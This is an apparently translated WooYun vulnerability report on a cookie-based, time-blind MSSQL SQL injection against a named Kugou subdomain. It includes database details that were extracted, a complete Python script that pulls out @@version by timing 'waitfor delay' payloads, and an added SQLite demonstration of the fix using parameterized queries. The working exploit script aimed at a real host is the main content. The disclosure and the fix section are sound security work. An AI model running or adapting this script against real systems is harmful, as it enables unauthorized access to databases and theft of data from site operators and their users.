
Kugou subsite MSSQL blind injection (with Python verification script)

2014-12-18 19:36

The injection point:

Code:
GET http://huodong.5sing.kugou.com/

Cookie: area=asfasfas

The `area` parameter is injectable; this is a cookie injection. The value is spliced into a SQL statement, so a single quote ends the string literal and whatever follows is parsed as SQL. The site runs Microsoft SQL Server, which allows stacked queries, so a timed branch (`waitfor delay`) can be appended and the answer read from the response time alone.

Proof of vulnerability:

Guessing the current database user (system_user), first 20 characters, gives:

Code:
web5singdbman

Guessing the first 29 characters of the database version:

Code:
SQL Server version is Microsoft SQL Server 2008 SP

(The script's character set contains no parentheses, so a "(" at any position is skipped rather than recovered; that is why the output reads "2008 SP" where the real @@version string has "2008 (SP".)

(Screenshot: kugou.png)



The script:

Code:
# Python 3 port of the original Python 2 proof-of-concept; the logic is unchanged.
import http.client
import random
import string
import urllib.parse

headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Character set tried at every position. A character outside this set
# (for example '(' or ')') is never matched, so that position is skipped.
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.', '-', '\\', ' ']

print('Try to retrieve SQL Server Version:')
result = ''   # replace @@version with system_user below to pull the database user instead
for i in range(1, 30, 1):
    for payload in payloads:
        timeout_count = 0
        for j in range(1, 3):
            try:
                # 3 s client timeout against a 5 s WAITFOR DELAY:
                # a timeout means the guessed character was right
                conn = http.client.HTTPConnection('huodong.5sing.kugou.com', timeout=3)
                random.seed()
                # random prefix keeps every cookie value unique, so no cached response is served
                area = str(random.random()) + "fasfa'; if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- " % (i, ord(payload))
                headers['Cookie'] = "area=" + urllib.parse.quote(area)
                conn.request(method='GET', url='/Default.aspx', headers=headers)
                conn.getresponse()
                conn.close()
                print('.', end='', flush=True)
                break                      # answered in time: wrong guess, next payload
            except Exception:
                timeout_count += 1         # timed out: probably the right guess
        if timeout_count == 2:  # 2 times to confirm
            result += payload
            print('[In Progress]', result)
            break

print('\n[Done], SQL Server version is', result)

Fix:

Filter the `area` cookie value; better, pass it to the query as a bound parameter instead of concatenating it into the SQL text.
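An added example of the fix, not code from the report or from the site: the same cookie lookup written three ways. The table, its rows and the keyword blacklist are all constructed for the demonstration. SQLite is used so it runs anywhere, and because SQLite has no WAITFOR the probe is the classic tautology rather than the report's timed IF; the point, string splicing versus parameter binding, is identical on MSSQL.

```python
import re
import sqlite3


def make_db():
    """Constructed table standing in for whatever the page looks up by
    the `area` cookie; the schema and rows are invented."""
    db = sqlite3.connect(':memory:')
    db.execute('CREATE TABLE activity (area TEXT, title TEXT)')
    db.executemany('INSERT INTO activity VALUES (?, ?)',
                   [('gd', 'Guangdong campaign'), ('bj', 'Beijing campaign')])
    return db


def lookup_vulnerable(db, area):
    """The report's bug: the cookie value becomes SQL text, so a quote in
    it ends the literal and the remainder is parsed as code."""
    sql = "SELECT title FROM activity WHERE area = '%s'" % area
    return [row[0] for row in db.execute(sql)]


def blacklist_filter(value):
    """An illustrative keyword 'filter' of the kind the one-word fix
    suggests (assumed, not the site's).  A single-pass deletion can be
    fed its own output, and it ignores the quote that does the damage."""
    return re.sub(r'(?i)waitfor|delay|or', '', value)


def lookup_filtered(db, area):
    """Filter, then splice: still injectable."""
    return lookup_vulnerable(db, blacklist_filter(area))


def lookup_parameterized(db, area):
    """The real fix: the value travels as a bound parameter, never as SQL
    text, so quotes and keywords inside it are just characters."""
    return [row[0] for row in
            db.execute('SELECT title FROM activity WHERE area = ?', (area,))]


if __name__ == '__main__':
    db = make_db()
    probe = "x' OR '1'='1"          # tautology standing in for the timed IF
    print('vulnerable   :', lookup_vulnerable(db, probe))
    # 'OoRR' survives a single pass of the filter as 'OR'
    print('filtered     :', lookup_filtered(db, "x' OoRR '1'='1"))
    print('parameterized:', lookup_parameterized(db, probe))
```

With the bound parameter the probe simply matches no row; the same holds for the report's stacked `'; if (...) waitfor delay ...` payload on MSSQL, where `SqlParameter` binding (ADO.NET) leaves the quote and the semicolon inside the value.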


Source: www.wooyun.org/bugs/wooyun-2014-081844
